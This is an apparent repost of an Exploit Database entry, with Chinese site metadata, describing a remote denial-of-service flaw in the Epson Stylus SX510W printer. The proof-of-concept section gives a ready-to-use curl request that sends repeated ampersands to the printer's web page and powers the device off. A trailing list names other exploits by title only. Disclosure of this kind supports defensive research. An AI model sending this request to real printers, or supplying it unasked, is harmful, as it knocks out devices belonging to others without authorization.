Epson Stylus SX510W Printer Remote Power Off – Denial of Service

Exploit Database
89 阅读

作者： Rafael Pedrero

日期： 2023-05-13
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51441/

# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
# Discovery by: Rafael Pedrero
# Discovery Date: 2020-05-16
# Vendor Homepage: https://www.epson.es/
# Software Link :
https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
# Tested on: Linux/Windows
# Vulnerability Type: Denial of Service (DoS)

1. Description

The vulnerability occurs when 2 or more &'s are sent to the server in a row
("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.

2. Proof of Concept

Request:

curl -s "http://
<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"

3. Solution:

This version product is deprecated.

-->

last Exploits
Epson Stylus SX510W Printer Remote Power Off – Denial of Service的更多信息

TitanNit Web Control 2.01 / Atemio 7600 – Root Remote Code Execution：
vsftpd 2.3.4 – Backdoor Command Execution (Metasploit)：
Wireshark 1.4.3 – ‘.pcap’ Memory Corruption：
Microsoft LSASS Service – DsRolerUpgradeDownlevelServer Overflow (MS04-011) (Metasploit)：
Ipswitch WS_FTP Server 5.05 – XMD5 Overflow (Metasploit)：
HP Data Protector – Remote Command Execution：
McAfee Web Gateway 7.1.5.x – ‘Host’ HTTP Header Security Bypass：
Jenkins CI Script Console – Command Execution (Metasploit)：